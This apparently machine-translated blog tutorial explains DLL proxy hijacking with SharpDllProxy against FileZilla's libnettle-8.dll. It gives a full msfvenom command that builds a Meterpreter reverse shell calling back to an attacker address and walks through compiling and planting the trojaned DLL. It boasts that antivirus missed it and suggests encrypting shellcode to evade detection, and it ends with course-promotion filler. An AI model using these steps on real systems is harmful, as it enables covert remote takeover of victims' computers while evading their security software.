DLL hijacking
After the Windows 7
version, the system uses KnowDLLs to manage DLLs, which are located in the registry under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager\KnownDLLs. The DLL files under this will be prohibited from being called from the directory where the exe itself is located. , but can only be called from the system directory (System32) directory. But not all dlls will be written into this registry, so DLL hijacking will occur.
Use the dll generated by msfvenom to kill directly.
SharpDllProxy
The listening name is probably similar to the socks proxy.
Tool source from: https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/
. For the specific implementation, you can also refer to this big guy's blog .
foreword
First understand the operating principle of the dynamic link library. If application A wants to use the GetFunkyData() function in the dynamic link library DataFunctions.dll, it needs to load the DataFunctions.dll dynamic link library. This tool is based on this consideration and creates a DataFunction.dll dynamic link library with the same name. It has two functions: ① Make a shortcut key to forward all functions to the authentic dynamic link library DataFunctions.dll , this is the origin of the proxy in the name; ②Write shellcode in this fake DataFunctions.dll. Attach the original picture of the author:
experiment procedure
target program
It took some time to do this experiment, such as FileZilla software, how to find the dll that needs to be loaded? As the author said, if you copy the software out, you will know what is missing. as follows:
Then it means that the DLL file needs to be loaded to run the modified application, so make a fake libnettle-8.dll for this DLL.
generate shellcode
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.29
LPORT=4444 -f raw > shell.bin
experiment started
First download SharpDllProxy: https://github.com/Flangvik/SharpDllProxy, and then use visual studio
2019 to compile it, try not to use other versions, because I used visual studio 2017 for various error reports and did not get it out for a long time, There may also be a problem with the environment.
Directly use vs to open the SharpDllProxy under the file --"
generate a solution
Generate a fake libnettle-8.dll using SharpDllProxy.dll. Put the shell.bin and the Dll that needs to be faked into the above file. Execute the following command: .\SharpDllProxy.exe
–dll libnettle-8.dll –payload
shell.bin
The generated file contains a C file and a dll, and this dll file is the original libnettle-8.dll
file.
Let's analyze this C language program. From line 9 to line 494, it is the function of forwarding DLL, and forward all the functions that need to be run to the original DLL for processing.
Line 497 is where we inserted the shellcode. The key code is only this point. In fact, the shellcode shell.bin can be directly written into the file, which reduces the number of suspicious files. Here is the shellcode that is read in binary and then executed using the VirtualAlloc memory operation. At this point, you can operate like a tiger by yourself, and use various anti-kill postures, such as changing the loading method, such as encrypting the shellcode first and then decrypting it to run.
Use VS to compile the above C file. File—"New—"Project—"Dynamic Link Library—"The project name is
libnettle-8. Copy the above C file code to compile in VS
Send the above three files (tmpD475.dll, libnettle-8.dll, shell.bin) to the target system. Use msf to monitor, and then run the program, and the session has been returned.
The most commonly used antivirus software: 360, Huorong and Security Manager were not found.
The antivirus software used: 360, Huorong and Security Butler were not found. [External link image transfer...(img-WvSrwdON-1680243246511)]
Network security engineer enterprise-level learning route
At this time, of course you need a systematic learning route
If the picture is too large and compressed by the platform, you can download it at the end of the article (free of charge), and you can also learn and communicate together.
Some of my collection of self-study primers on cyber security
Some good video tutorials I got for free:
The above information can be obtained by [scanning the QR code below] and shared for free
